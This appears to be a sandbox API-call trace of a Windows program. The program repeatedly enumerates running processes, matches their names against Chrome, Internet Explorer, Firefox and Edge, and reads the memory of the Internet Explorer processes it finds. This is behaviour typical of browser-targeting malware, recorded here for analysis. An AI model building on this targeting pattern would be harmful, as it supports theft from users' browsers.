	[0212.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.175] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0212.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.175] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.176] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0212.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.177] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.178] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0212.178] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x3cd4
	[0212.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.178] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0212.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.179] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.179] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0212.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.180] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.180] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0212.181] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x3cd8
	[0212.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.181] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0212.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.181] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0212.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.181] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0212.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.182] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.182] NtQueryInformationProcess (in: ProcessHandle=0x3cd8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0212.182] ReadProcessMemory (in: hProcess=0x3cd8, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0212.182] ReadProcessMemory (in: hProcess=0x3cd8, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0212.182] ReadProcessMemory (in: hProcess=0x3cd8, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0212.182] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0212.182] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0212.183] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x3cdc
	[0212.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.183] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0212.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.184] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0212.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.184] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0212.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.184] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.184] NtQueryInformationProcess (in: ProcessHandle=0x3cdc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0212.185] ReadProcessMemory (in: hProcess=0x3cdc, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0212.185] ReadProcessMemory (in: hProcess=0x3cdc, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0212.185] ReadProcessMemory (in: hProcess=0x3cdc, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0212.185] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0212.185] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0212.186] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x3ce0
	[0212.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.186] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0212.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.186] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.187] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0212.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.187] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.187] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0212.188] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x3ce4
	[0212.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.188] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0212.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.188] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.189] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0212.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.189] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.189] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.190] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x3ce8
	[0212.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.190] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.190] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.190] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.191] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.191] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.192] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.193] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x3cec
	[0212.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.193] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.193] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.193] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.194] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.194] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0212.195] CloseHandle (hObject=0x188) returned 1
	[0212.195] Sleep (dwMilliseconds=0x64) 
	[0212.302] GetCurrentProcessId () returned 0x110
	[0212.302] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0212.307] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0212.308] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0212.310] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0212.310] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x3cf0
	[0212.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.311] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0212.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.311] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.311] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0212.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.312] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.312] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0212.313] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3cf4
	[0212.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.313] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0212.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.313] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.314] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0212.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.315] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.315] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0212.316] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x3cf8
	[0212.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.316] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0212.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.316] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.317] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0212.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.318] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.318] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0212.319] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x3cfc
	[0212.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.319] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0212.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.319] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.320] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0212.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.320] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.320] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0212.321] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3d00
	[0212.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.321] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0212.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.321] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.322] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0212.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.322] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.322] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0212.323] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3d04
	[0212.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.323] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0212.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.324] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.324] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0212.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.324] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.325] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0212.325] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3d08
	[0212.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.325] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0212.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.326] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.326] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0212.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.326] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.326] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0212.327] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3d0c
	[0212.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.327] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0212.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.328] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.328] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0212.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.328] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.328] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.329] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x3d10
	[0212.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.329] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.330] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.330] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.330] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.330] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.331] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3d14
	[0212.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.331] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.332] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.332] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.333] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.333] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.334] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3d18
	[0212.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.334] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.334] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.334] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.335] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.335] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.336] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x3d1c
	[0212.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.336] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.336] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.337] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.337] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.337] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.338] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x3d20
	[0212.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.338] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.338] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.339] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.339] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.339] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.340] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x3d24
	[0212.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.340] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.340] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.341] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.341] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
